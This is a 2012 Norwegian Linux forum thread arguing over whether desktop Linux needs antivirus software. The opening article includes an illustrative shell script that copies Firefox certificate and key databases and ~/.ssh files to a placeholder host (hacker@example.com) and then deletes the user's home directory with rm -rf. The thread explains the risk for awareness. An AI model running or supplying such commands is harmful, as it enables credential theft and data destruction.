//]]>-->

«Linux kan ikke få virus»

«Linux kan ikke få virus»

Innleggav Aeyoun » tor 30.08.2012 1:08

En vanlig oppfatning blant avanserte brukere (mange hjemmebrukere som har installert Linux selv faller inn i denne kategorien) er at «Linux kan ikke få virus» og «som en avansert bruker kan jeg overliste potensielle virus». Derfor er det ikke utbredt å installere et antivirusprogram på Linux. Denne holdningen bør revurderes: for sikkerhetens skyld.

Påstanden om at Linux er virusfritt og at man ikke trenger beskyttelse for det er populær, men det gjør den ikke mere sann. Apple har i mange år brukt en lignende påstand i markedsføringen sin. I løpet av våren i år byttet de ut reklameteksten «Macer får ikke PC virus» med «bygget for å være sikker.» I løpet av det siste året har markedet for antivirusprogrammer gått fra at ingen tilbød antivirus til OS X til at alle de store selskapene nå tilbyr det. Det har har oppstått et markedskappløp mot de mange virus som har sprettet opp på rekke og rad til plattformen.

Hva har egentlig endret seg slik at OS X ble et mål for ondsinnede programmer? Ikke annet enn markedsandelen til operativsystemet og dermed også hvor virusskaperene retter sitt fokus.

OS X er bygget på mye av det samme fundamentet og med den samme innebygde sikkerheten som beskytter Linux. Mange av brukernes oppfatting om at det er et uinntagelige slott er også dessverre den samme. Linux er like sikkert som OS X. Eller for å si det på en annen måte: Linux er like usikkert som OS X.

I trusseloversikten utgitt av Norsk Senter for Informasjonssikring kan man stadig hente ut nye eksempler på angrepsvinkler som kan benyttes for å angripe Linux. Den nyeste trusselen som nevnes i oversikten er den mye medieomtalte sårbarheten i Java som blant annet ble funnet hos Teknisk Ukeblad. Denne trusselen lar kode kjøre på maskinen uten at brukeren er involvert. Alt brukeren trenger å gjøre er å besøke en nettside som inneholder denne trusselen for å bli infisert. Slike sårbarheter kan spre seg raskt via for eksempel et annonsenettverk eller etter etter en aggressiv overtagelse av en nettside brukeren besøker.

Om en angriper får muligheten til å kjøre en hvilken som helst kode på maskinen uten samtykke og med samme tillatelser som brukeren: hva kan skje? Linux og andre moderne operativsystemer skiller en vanlig bruker fra super-brukeren ‹root›. Som super-bruker kan man avinstallere programmer for alle brukere og gjøre store endringer på systemet. Som en vanlig bruker kan man likevel installere kjørbar programvare og kjøre skript.

En angriper med muligheten til å kjøre en hvilken som helst kode kan for eksempel kjøre dette nesten komplette angrepseksempelet:

!#/bin/env sh

# kopier over filer som inneholder passord og sertifikater til en angriper
scp ~/.mozilla/firefox/*/cert*.db hacker@example.com:stolen-passwords
scp ~/.mozilla/firefox/*/key*.db hacker@example.com:stolen-passwords
scp -r ~/.ssh/* hacker@example.com:stolen-passwords
# slett så mye som mulig av brukerens hjemmappe for å fjerne spor av
# og hemme brukerens muligheter til å stoppe angrepet underveis
rm -rf ~/


Ugang og økonomisk svinn som kan oppstå etter at noen andre har fått tak i bankens, Facebooks, Google Mails, eller arbeidsplassens passord kan være stor. Et økonomisk rettet angrep er kun så vellykket som angriperens mulighet og evne til å utnytte det finansielt. Eksempelet ville uansett vært en ubehagelig opplevelse for brukeren.

Et annet tenkt angrep kan legge til en systemoppgave som jevnlig blir kjørt uten at brukeren vet om det. Fra en slik posisjon på systemet kan ny kode hentes ned, og kontinuerlig informasjon om brukerens aktivitet kan sendes ut av systemet. Dette er trolig en større trussel for bedriftsspionasje enn for en hjemmebruker da økonomisk informasjon ofte vil ha ble stjålet med engang systemet ble tatt ut av brukerens kontroll.

Bare i løpet av en enkelt dag vil en bruker åpne utallige filer, være innom mange forskjellige nettsider, motta epost og direktemeldinger fra et utall kjente og ukjente parter.
Mye av denne aktiviteten er bygget på tillit. I nettleseren har brukeren tillit til sikkerhetsindikatorene. DeT grønne eller gule symbolområdet nært adresselinjen som indikerer at det er en sikker forbindelse fra brukeren til tjeneren på andre enden av tilkoblingen. Det betyr at ingen mellom kan snappe opp det som overføres mellom de to partene, men det gir ingen garantier for hvem det er brukeren egentlig kommuniserer med.

Når en bruker besøker nettbanken sin i en nettleser lastes det inn flere skript, bilder, stilark, og andre filer som tilsammen utgjør nettsiden. Nettlesere er ganske smarte beist som har sikkerhetsretningslinjer som er ment å forhindre tredjeparts ondsinnede skript fra å bli injisert på sider. Når disse retningslinjene blir forsøkt tøyet eller brutt kan nettleseren svare med å redusere sikkerhetsnivået på siden. En bruker vil til vanlig se dette ved at den gule eller grønne sikkerhetsindikatoren blir fjernet. Dette skjer stadig vekk rett og slett på grunn av overseelser fra utviklerne bak nettsiden uten at det er et forsøk på svindel eller en sikkerhetsrisiko. For brukeren kan det være ugreit å vite om det bare er en uskyldig feil som er begått eller forsøk på svindel.

Et antivirusvarsel når brukeren besøker en nettside er derimot mer alvorlig. Det betyr at en eller flere av filene som ble hentet inn når brukeren lastet inn siden til nettbanken inneholdt enten en tidligere gjenkjent eller en ny og lignende variant av en tidligere gjenkjent trussel. Selv om nettleseren eller antivirusselskapet kan ha hindret programkoden på nettsiden til å kjøre er det en tydelig indikasjon på at ikke alt er som det skal enten hos banken, på brukerens maskin, eller et sted i mellom.

Om dette skulle skje bør brukeren ta kontakt med banken for å varsle om forholdene og forhøre seg om hva de bør gjøre — eller bare vente noen dager med å gjøre bankbesøket. Uten antivirusprogrammet vil ikke brukeren ha fått noen indikasjon på at det var noe galt og risikerer å oppgi passord og kredittkortinformasjon til en tredjepart.

Dette er bare ett eksempel på hvor antivirus kan være nyttig. Det er ikke bare nettleseren og programtilleggene som kjører i den som er populære mål. Et ebrev som tilsynelatende kommer fra banken, PayPal, eller Facebook kan være sendt av noen andre. Om ebrevet inneholder lumskheter kan antivirusprogrammet hindre det fra å gjøre skade og et varsel når ebrev åpnes vil gjøre brukeren kritisk til avsenderen. Om ebrevet inneholder en lenke som peker til en nettside som er noe annet enn brukeren tror det er, kan antivirus være en lur venn i bakgrunnen om det skulle lure seg lumskheter på den ander siden av lenkeklikket.

Antivirus kontrollerer filer brukeren eller brukerens programmer har bedt om å åpne før brukeren eller programmet får tilgang til dem. Filene kontrolleres opp mot virusdefinisjonsfiler som lister opp kjente ondsinnede programmer, hvordan tidligere kjente ondsinnede programmer oppfører seg, og hvordan koden deres ser ut. Om filen som åpnes ikke finner et treff på listen får brukeren eller programmet tilgang til å åpne den. Dette kalles ved-tilgangbeskyttelse eller sanntidsbeskyttelse.

Antivirusprogrammer vil også forsøker med varierende hell å analysere hva et program prøver å oppnå og prøver å bedømme hvorvidt dette vil være skadelig for brukerens system. Om en fil blir flagget kan filen bli innsendt til selskapet for videre analyse, og tilgang til filen kan bli blokkert hvis mistanken om at den er ondsinnet er sterk nok.

Antivirusselskapene lager lister med definisjoner av nye virus og deres oppførsel, og oppdateringer av listene blir dyttet ut og installert. Det er disse listene mange antivirusselskaper tar en årlig abonnementsavgift for å gi brukeren tilgang til.

Det er på grunn av dette at det viktigste og vanligste sikkerhetsrådet er nettopp å alltid ha oppdatert programvare og operativsystem. Automatiske oppdateringer er mer brukt nå enn før, men bruker bør likevel innimellom kontrollere at ting på systemet blir holdt oppdatert.

Du kan aldri være helt sikker. Teknologien vi har i dag er ikke laget for å være sikker. Hadde operativsystemene våre vært helt uinntagelige slott så ville vi aldri ha brukt de. Det hadde vært for begrensende for hva vi selv hadde ønsket å gjøre til at det hadde vært nyttig for brukerne. I en usikker hverdag er det dumt å fremmedgjøre en så god partner som et antivirusprogram. Spesielt når det finnes helt kostnadsfrie alternativer.

Det vil komme en oppfølgingsartikkel om noen dager her på Linux1 med en gjennomgang av enkelte antivirustilbud hjemmebrukere har for Linux. Denne er nå tilgjengelig: Antivirustilbudet for hjemmebrukere.

Linux har blitt brukt som et eksempel gjennom hele teksten, men de samme forholdene gjelder på andre operativsystemer også.
Sist endret av Aeyoun den tor 06.09.2012 16:03, endret 2 ganger.
medlem i 85 måneder
 

Takker for oppklarende artikkel

Innleggav JimmyVolatile » tor 30.08.2012 10:53

Jeg har i mange sammenhenger reklamert for at Linux er et vanskelig og lite attraktivt mål for virus-skapere men samtidig er jo Linux bare kjernen i operativsystemet og det handler jo like mye om hva man legger på toppen av dette av programmer og tjenester. Jeg burde kanskje moderere denne reklamen litt.

Konklusjonen er vel kanskje at Linux-baserte maskiner bare er trygge så lenge Linux ikke blir for populært eller så lenge du ikke bruker for populære programmer.

Har du/noen forresten erfaringer med hvordan slike ting som AppArmour fungerer i forhold til sikring av maskiner?
medlem i 125 måneder
 

Sandkassebeskyttelse

Innleggav Aeyoun » tor 30.08.2012 17:00

Har du/noen forresten erfaringer med hvordan slike ting som AppArmour fungerer i forhold til sikring av maskiner?

Nei, ikke mye. AppArmour og SELinux er en god intensjon, men jeg vet ikke mye om det. Det er sikkerhetsretningslinjer for operativsystemet som forsøker å begrense oppgavene programmer kan utføre til kun kjente oppgaver. Dette gjøres ved å sette hvert program i hver sin sandkasse (‘sandboxing’) med satte begrensninger. Jeg skal undersøke AppArmour og kommer tilbake med mer informasjon.



Konklusjonen er vel kanskje at Linux-baserte maskiner bare er trygge så lenge Linux ikke blir for populært eller så lenge du ikke bruker for populære programmer.

At Linu er upopulært er ikke akkurat den beste elementet man kan bruke i reklame heller.



Jeg synes det var morsomt å se Google AdSense viser Bitdefender og Norton annonser sammen med denne artikkelen. «Even Macs get viruses» og «Flashback trojan hits Mac users! Protect your Mac with Norton.»





Sist endret av Aeyoun den tor 30.08.2012 18:01, endret 1 gang
medlem i 85 måneder
 

Fra eksempelet ovenfor

Innleggav viking60 » fre 31.08.2012 10:40

Fra eksempelet ovenfor (Teknisk Ukeblad):

"Klienter med sårbar Java vil etter kjøring av .jar-filen hente ned en PE Exe-fil"

Det ser ut til at Linux fortsatt er relativt trygg da.

Når det gjelder popularitet på Desktop så ser det ikke ut til å være noen overhengende fare for at noen skulle gidde å lage et virus heller.
Men den som hadde klart å lage et virus for Apache-serveren, som virkelig er utbredt, hadde virkelig får guru status i hacker miljøet - og det skjer ikke.
Så det er ikke nødvendivis en sammenheng mellom utbredelse og virus infeksjoner.

Siden Java-exploiten krever at en trykker aktivt på en lenke så vil bruk av add block og lignende være en god forsikring uansett, da det ikke er godt å si hvor alle reklamelenkene fører hen.

Når det gjelder Android Linux så burde jo den ha det største virusproblemet av alle da den er utvilsomt størst i Mobilmarkedet.

Her kreves det at man installeres Apper selv for å kunne bli infisert av f.eks SMSZombi
Jeg tror at Android skiller seg fra Desktop Linux ved at det ikke tas i bruk repos, noe som minsker sikkerheten.
Det er klart at myten om at Linux ikke kan infiseres godt kan fremheves. Microsoft er vår venn og hjelper oss så gjerne :)

Når det er sagt - finnes det vel få eksempler på en virusinfeksjon (annet en testformål) i Linux?
Det er skjermsparere etc som lastes ned fra andre steder enn repoene som kan være infiserte. Sosiale medier ser ut til å senke kritiske terskler og også øke faren for virusinfeksjon.

rkhunter og chrootkit er to programmer som minsker risiko.
Clam AV sjekker mail slik at MS slipper å bli infisert og repoene representerer en sikkerhet i seg selv.

Så det er vel fortsatt slik at:
Fravær av dumheter er per dato tilstrekkelig til å være trygg i Linux.

På den annen side så må vel et utbredt desktopsystem kunne håndtere "dumme" brukere også.

Det er jo sant at Unix/BSD baserte Mac har fått problemer, og at slektskapet er der, men det begynner å bli en fjern slektning da systemet er lukket og låst , det minsker muligheten for å treffe sikkerhetstiltak selv - Apple må gjøre det for deg.

Så jeg tror at en avansert bruker faktisk kan overliste potensielle virus, eller rettere sagt: Et antivirusprogram vil fortsatt ikke garantere sikkerhet, eller erstatte denne fornuftige brukeren.

Brukerens avatar
medlem i 119 måneder
 

Re: «Linux kan ikke få virus»

Innleggav QtanJ » ons 05.09.2012 20:16

Eg kjøpte ny bærbar for nokre dagar sidan. Der måtte eg sjølv passa på at eg ikkje køyrde som administrator på windows. Eg har ikkje fått tid til å installere linux endå utan at det vert ustabilt på grunn av vanskeleg maskinvare. For lite kompetente folk er dette eit stort tryggleiksproblem. Dette er ein gruppe menneske som sannsynlegvis ikkje ville funne på å installere linux sjølv.

Det nivået brukarar som installerer enkel linux lærer ganske fort at det ikkje er smart å bruka administrator som standardbrukar. Så vidt eg veit fortel dei enkle distribusjonane at det ikkje er bra på ein enkel måte mange stader. Standarden er å laga passord på to brukarar i staden for ein. Desse brukar gjerne standardkonfigurasjonar som gjev relativt grei tryggleik med tanke på balansegongen mellom tryggleik og god brukaroppleving.

Det tredje nivået brukarar endrer standardoppsettet slik at det anten vert for knotete å bruka eller for usikkert. Dersom det er for vanskeleg vert ein gjerne lei av systemet og brukar unødig tid på oppsett. Dersom det er usikkert står ein i faresona for å ufrivillig dele sensitive personleg data.

Deretter kjem dei som veit kva dei gjer og vel tryggleiksnivå sjølv. Dei aksepterer ein viss grad av tryggleikshol, fordi det tek for lang tid å setja opp dersom dei alltid skal sikre seg mot tryggleikshol.

Konklusjonen min er at første og tredje nivå er det farlegaste og at andre og fjerde nivå er dei beste. Derimot er det gradar av alle nivåa og dei kan verta kombinerte i ulike samanhengar. Ein kan alltid vera sikrare, men det er ikkje gitt at det er lurt. Kommersiell antivirus har for dårleg lisens til at eg vil bruka anna enn spesielle situasjonar. Det er fordi eg trur eg ligg på eit tryggleiksnivå som er bra nok til at eg ikkje treng gjera akkurat det kompromisset. Men eg kan ikkje utelukke at eg på enkelte område gjer dumme val som verken gjer livet mitt meir brukarvenleg eller tryggare.

Det finst heilt klart situasjonar der knotete oppsett kan vera svært legitimt. Dersom det er snakk om sensitive opplysingar kan det vera ganske greitt å ha fleire administratorar som til saman lagar eit godt oppsett og som administrerer dette slik at det ikkje er så veldig stort hinder.

Linux og programma oppå linux har heilt klart sine feil, men dersom tryggleikshol vert annonsert tek det ganske kort tid før nokon lagar patch som anten fiksar problemet, omgår problemet eller deaktiverer utsett funksjonalitet. Det er ikkje like tungrodd som Oracle-java der ein må deaktivera heilt fram til ny funksjonalitet er på plass. Eg likar då å kunne deaktivere/aktivera i nettlesaren utan å starta han på nytt. Då er tryggleiken grei.

Det er eit tryggleiksproblem å bruka oracle-java i distribusjonar som ikkje tilbyr dette dersom ein ikkje er oppdatert på problematikken sjølv.

*PS Sjølv om eg skriv på måten eg gjer betyr ikkje det at det nødvendigvis at eg ser på det eg skriv som ein fasit. Berre at det er måten eg tenkjer på akkurat no.
medlem i 153 måneder
 

Re: «Linux kan ikke få virus»

Innleggav viking60 » fre 07.09.2012 11:14

Stort sett enig.
Det som jeg føler mangler litt for å skape et helhetlig bilde er hvor stor er sjansen for å faktisk bli infisert på Linux skrivebordet?

Finnes det en (mangeårig) bruker av Linux desktop her som faktisk har blitt infisert?
Det er mye "hear-say" i bransjen så jeg er ute etter en som faktisk har opplevd dette?
Jeg har ikke klart det, selv uten firewall og ukritisk åpning av alle e-poster jeg kommer over.
Jeg har heller ikke klart å finne noe fornuftig statisitkk på dette - lenker mottas med takk.

Det finnes virus med historie helt tilbake til 1996 men det er snakk om en håndfull som ikke krever en sanntidsbeskyttelse men muligens en virusscan 1 gang i mnd.
I så måte har Trinity Rescue Kit et bra AV utvalg.
Clam AV
F-prot
BitDefender
Vexira
Avast (lisens kreves - gratis men tungvint)

(Jeg sikter til skrivebordsbruk - servere er en annen sak.)

Jeg har sans for den litt tabloide overskriften i denne tråden - det skal jo være catchy -
men så langt jeg kan skjønne så er gehalten langt innenfor det en ansvarlig politiker vil kalle en absolutt sannhet. :-D

PS - Dersom lenkene ovenfor ser rare ut så må du gå til forumet. Drupal og PHPbb ser ikke ut til å være synket begge veier.

Brukerens avatar
medlem i 119 måneder
 

Med tanke på at Java ikke

Innleggav HrKristian » tor 13.09.2012 14:34

Med tanke på at Java ikke kjører med root-access er det veldig begrenset hva et Java-script faktisk kan gjøre.
Windows sin NAT-beskyttelse på en annen side er uhyre enkel å komme rundt.

Jeg har brukt Ubuntu Linux i flere år nå og har vært innom utallige lugubre sider i god tro om at jeg har vært trygg, og det har jeg også vært...

Hva angår virus til Linux generelt, viser jeg som regel bare til server-parker, der OS basert på Linux-kernels er mest populære.
Når Linux er et så potensielt profitabelt mål ville utbredelsen av virus/malware mot plattformen vært langt, langt mer utredt i dag enn den er om det var mulig.

"A virus/trojan/worm author who successfully targeted specifically Apache httpd Linux/x86 Web servers would both have an extremely target-rich environment and instantly earn lasting fame, and yet it doesn't happen." -Rick Moen
medlem i 82 måneder
 

Re: Med tanke på at Java ikke

Innleggav Aeyoun » lør 15.09.2012 12:50

HrKristian skrev:Jeg har brukt Ubuntu Linux i flere år nå og har vært innom utallige lugubre sider i god tro om at jeg har vært trygg, og det har jeg også vært.

Hvordan vet du at du er trygg? Det er et av poengene artikkelen min—kanskje ikke helt vellykket—prøver å komme med. Det er veldig lenge siden brorparten av ondsinnede virus var destruktive og skapte problemer med å bruke maskinen. Det er økonomiske motiver som driver de nå. Ofte i form av spionasje mot bedrift og privat (bankinnlogging, kredittkort, osv.) eller kanskje som en del av et botnet som sender spam eller angriper en tredjepart i det stille. De aller fleste vil ikke merke dette selv om maskinen gjør arbeid for en tredjepart over flere år.
HrKristian skrev:Med tanke på at Java ikke kjører med root-access er det veldig begrenset hva et Java-script faktisk kan gjøre.

Med samme tillatelser som brukeren kan man gjøre det samme som brukeren. Se på eksempelet jeg gir i artikkelen hvor filer som inneholder brukerens brukernavn og passord blir sendt til en tredjepart.
viking60 skrev:Det som jeg føler mangler litt for å skape et helhetlig bilde er hvor stor er sjansen for å faktisk bli infisert på Linux skrivebordet? […] Finnes det en (mangeårig) bruker av Linux desktop her som faktisk har blitt infisert?

Det er jeg helt sikker på at det gjør, men litt på grunn av arrogansen jeg åpner artikkelen med og på grunn av grunnene jeg gir i svaret over: de vet det ikke selv. Med andre ord kan det være mange vellykkede angrep. Blir det oppdaget og bransjen og involverte parter kan ta preventive steg er det jo tross alt ikke så veldig vellykket.
viking60 skrev:Jeg har sans for den litt tabloide overskriften i denne tråden - det skal jo være catchy - men så langt jeg kan skjønne så er gehalten langt innenfor det en ansvarlig politiker vil kalle en absolutt sannhet. :-D

Jeg er glad det er iallfall én som satte pris på det.
medlem i 85 måneder
 

Det er fri programvare og ikke Linux som beskytter mot virus

Innleggav mkotsbak » man 17.09.2012 10:35

Nå er det jo slik at virus er ikke-eksisterende i fri programvare, siden man med kildekoden ville oppdaget det med en gang. Så når man som Linux OS-bruker bruker stort sett fri programvare hentet fra de offisielle pakkebrønnene så burde det ikke dukke opp noe virus eller skadelig programvare heller.

Selv om Mac OS X er basert på unix-teknologi så er brukerne der på samme måte som under Windows vant med å laste ned programvare fra nettet med nettleseren, og da er det opp til brukeren å vurdere hva som er trygt.

I tillegg så kommer piratkopiering, som under Linux ikke er vanlig siden man finner det meste man trenger gratis som fri programvare, og det dessuten finnes lite ufri programvare tilgjengelig å piratkopiere. Jeg vil tro det meste av virusene kommer fra piratkopiert programvare eller tvilsomme reklamebannere på stedene slikt lastes ned.

Ditto for Android, der er det veldig mye ufri programvare tilgjengelig i Market/Play og også ikke uvanlig å laste ned programvare utenom denne direkte fra Internett.
medlem i 82 måneder
 

Re: Det er fri programvare og ikke Linux som beskytter mot virus

Innleggav Aeyoun » man 17.09.2012 13:35

mkotsbak skrev:Nå er det jo slik at virus er ikke-eksisterende i fri programvare, siden man med kildekoden ville oppdaget det med en gang. Så når man som Linux OS-bruker bruker stort sett fri programvare hentet fra de offisielle pakkebrønnene så burde det ikke dukke opp noe virus eller skadelig programvare heller.

Hm. Derfor har vi aldri sikkerhetsoppdateringer til ting fra offisielle pakkebrønner. Vi har heller ikke problemer som Debian-OpenSSL-problemet hvor ‹random-faktoren› i sertifikatene var forutsigbare. ;)
medlem i 85 måneder
 

Re: Det er fri programvare og ikke Linux som beskytter mot virus

Innleggav mkotsbak » man 17.09.2012 16:00

Aeyoun skrev:
mkotsbak skrev:Nå er det jo slik at virus er ikke-eksisterende i fri programvare, siden man med kildekoden ville oppdaget det med en gang. Så når man som Linux OS-bruker bruker stort sett fri programvare hentet fra de offisielle pakkebrønnene så burde det ikke dukke opp noe virus eller skadelig programvare heller.

Hm. Derfor har vi aldri sikkerhetsoppdateringer til ting fra offisielle pakkebrønner. Vi har heller ikke problemer som Debian-OpenSSL-problemet hvor ‹random-faktoren› i sertifikatene var forutsigbare. ;)


Jeg har ikke sagt at man ikke skal installere sikkerhetsoppdateringer (det er jo veldig enkelt å installere disse automatisk for _all_ programvare under Linux-distroer). Disse installerer jeg selvfølgelig, og Debian sitt OpenSSL-problem ble grundig kunngjort med verktøy og prosedyrer for å løse problemet. Jeg mente bevisst skadelig programvare/virus. Man bør ikke gamble på at en antiviruspakke gjør dette for deg. Dessuten introduserer man en ny lukket programvare som kan ha sikkerhets-/stabilitetsproblemer i seg selv.

Om du mener skadelig programvare som kan ha kommet inn gjennom sikkerhetshull så er det ingen garanti for at antivirusprogrammet finner disse heller.

Med slike artikler så blir bare brukere skremt til å bruke Windows eller Mac istdet, selv om disse har en mye høyere andel installert spyware/virus/adware etc.
medlem i 82 måneder
 

Re: «Linux kan ikke få virus»

Innleggav viking60 » man 17.09.2012 18:15

Jeg vil gi kred til trådstarter for å ta opp temaet da det i seg selv bidrar sterkt til at Linux holder seg virusfri.

Men han blir nok litt (muligens bevisst) moraliserende overfor debatanter med avvikende syn - som sistnevnte taler. :rolls eyes:

Jeg har gått i meg selv og blitt der en stund for å finne ut om det er grunnlag for den virus "paranoiaen".

Jeg la merke til at trådstarter fant Comodo best som AV med sanntids beskyttelse og GPL så jeg tenkte at ja siden det jo er uansvarlig å bare "lukke øynene og håpe det beste" så burde jo Centos og Suse ha dette i sine standard repoer.

Nix og null! Det er clam som dominerer over hele linjen og comodo forefinnes heller ikke når jeg legger til noen vanlige repoer.

Det er her heller ikke presentert noen dokumentasjon på at virusinfeksjoner i Linux forekommer ï en skala som som skulle tilsi en sanntids AV beskyttelse.

Aeyoun er sikker på at mange Linux brukere er/har vært infisert uten å vite det, men kan ikke dokumentere noe omfang og ingen har heller sett seg kallet til å ile til med sine eksempler.

Det vi har fått etablert er at det er teoretisk mulig at Linux blir infisert. Det er en tynn bakgrunn for å installere en sanntids virusbeskyttelse for Linux-virus.
Mail etc som også sendes til Windows-klienter må selvsagt fortsatt renses for virus.

Perspektivet som tegnes blir derfor noe vridd og tatt ut av en naturlig sammenheng (Mac og WIndows infeksjoner).

Linux har pakkebrønner og signatursystemer som skiller seg fra de to andre og deri ligger en vesentlig sikkerhetsforskjell som mkotsbak fremhever.

Men det er fortsatt slik at dersom du er typen som "lukker øynene og håper det beste" så er Linux OS'et for deg!

På en fare-skala fra Null infeksjon til Garantert infeksjon; så ligger Linux et sted mellom "mikroskopisk" og "forsvinnende liten".
Mac antas å ligge på "liten" og Windows i nærheten av "sansynlig til sikkert" - uten AV.

Det er litt tabloid formulert men det har ikke lyktes meg å finne en eneste statistikk over Linux infeksjoner og på min etterlysning her har jeg heller ikke fått noen respons.
Det fører til den slutning at det ikke finnes praktiske ekesmpler på at virus er et problem i Linux.

Alt vi har å gå på er da at trådstarter er sikker på at infeksjon har funnet sted hos mange og at disse ikke er klar over dette.

Igjen: - no offence - det er et viktig tema å ta opp, men slik jeg oppfatter det så er det tilstrekkelig med litt oppmerksomhet og ikke nødvendig med sanntids Linux AV.

En oppfatning som jeg umiddelbart er villig til å revurdere dersom noen faktisk kan gi meg en lenke til en statistikk over Linux infeksjoner...

Rootkits omfattes ikke av dette resonementet - alle bør installere rkhunter og chkrootkit først i alle sine Linux distroer.
Og det skader heller ikke å overvåke autostart mappene i KDE og Gnome, så bevistheten som Aeyoun markedsfører rundt dette er tross alt brillefin!

Brukerens avatar
medlem i 119 måneder
 

Re: «Linux kan ikke få virus»

Innleggav QtanJ » tir 18.09.2012 0:01

Er det gitt at desse antivirus-programma her skanner for linux-virus? Eg brukar stort sett berre antivirus på data(dokument, bilete o.l.) som skal til windowsmaskinar, og då ein eller fleire andre program enn det som er installert på målsystemet.

For privat bruk er ikkje det så aktuelt for meg, og dei fleste andre antivirus enn clamav eg har sett på lisensen til, krev betaling av kommersiell lisens, og forbyr bruk av privat lisens for ikkje-kommersielle bedrifter som idelle organsiasjonar og tilsvarande.

Uheldigvis ser det og ut som clamav er det einaste, i enkelte tilfelle, som ikkje oppdagar viruset det er snakk om.

Men ja, tryggleik på linux krev, som på alle andre operativsystem visse forholdsreglar og avhengig av kor paranoid ein er, krev fleire eller færre tiltak. Å ikkje bruka root unødvendig er vel det viktigaste, men det vernar ikkje dei data som er leseleg av brukaren som vert utsett for risiko.

Difor burde kanskje linux-skrivebordet lagt til rette for ein firefox-brukar, ein KDE/Gnome-brukar, ein personleg brukar m.m. Det ville avgrensa skadeomfanget truslar ein møter gjennom nettlesaren til akkurat den nettlesaren og ikkje andre personlege data. Då måtte ein brutt seg gjennom fleire lag for å nå fram. Dersom ein brukte ein dedikert nettbank-nettlesar ville ikkje nettlesaren for tvilsomme sider kunne stele data derifrå. Å ha fleire uavhengig firefox-instansar som ikkje kan kommunisera med kvarandre ville gitt: ein installasjon, fleire profilar.

Kvifor skal firefox-brukaren få tilgang til informasjon om kva andre brukarar heiter og kva prosessar andre brukarar køyrer? Per i dag er det nok dette for vanskeleg å bruka i praksis for dei aller fleste. Eg kunne sikkert klart noko slikt ved hjelp av ssh-nøklar, eller evt eigendefinert pam-konfigurasjon, men trusselen er ikkje stor nok. Dessutan finst det sikkert feil i programvare eg ikkje kan hindra tilgang til.
medlem i 153 måneder
 

Re: «Linux kan ikke få virus»

Innleggav mkotsbak » tir 18.09.2012 9:54

QtanJ skrev:Er det gitt at desse antivirus-programma her skanner for linux-virus? Eg brukar stort sett berre antivirus på data(dokument, bilete o.l.) som skal til windowsmaskinar, og då ein eller fleire andre program enn det som er installert på målsystemet.


Det lurte jeg også på. De antivirus-programmene (inkl. clamav) jeg har sett før har bare scannet for Windows-virus i epostvedlegg.

Dersom ein brukte ein dedikert nettbank-nettlesar ville ikkje nettlesaren for tvilsomme sider kunne stele data derifrå. Å ha fleire uavhengig firefox-instansar som ikkje kan kommunisera med kvarandre ville gitt: ein installasjon, fleire profilar.


Jeg pleier å bruke incognito-vindu i Chromium for nettbank. Da kan ikke andre sider få tilgang til sesjonssmåkaker, JS-objekter o.l, og man er garantert at den kjører i en annen prosess enn andre nettsider. Bare vær obs. på at flere ingognito-vinduer/tabs ikke er isolert. Denne teknikken bruker jeg også for å være pålogget to ulike Google-kontoer samtidig (jobb og privat).

Hvis nettbanken krever Firefox (fy!), eller at Java-installasjonen min fungerer dårlig, så er det ikke alltid jeg gidder å bruke tilsvarende teknikk der, siden det krever at alle vanlige websider lukkes mens man er i privat nettsurfing.
medlem i 82 måneder
 

Re: «Linux kan ikke få virus»

Innleggav viking60 » tir 18.09.2012 12:54

Noen som har prøvd TOMOYO?

Brukerens avatar
medlem i 119 måneder
 

Neste

Returner til Artikler (Linux1)



Hvem er i Forumene

Registrerte brukere: Google [Bot]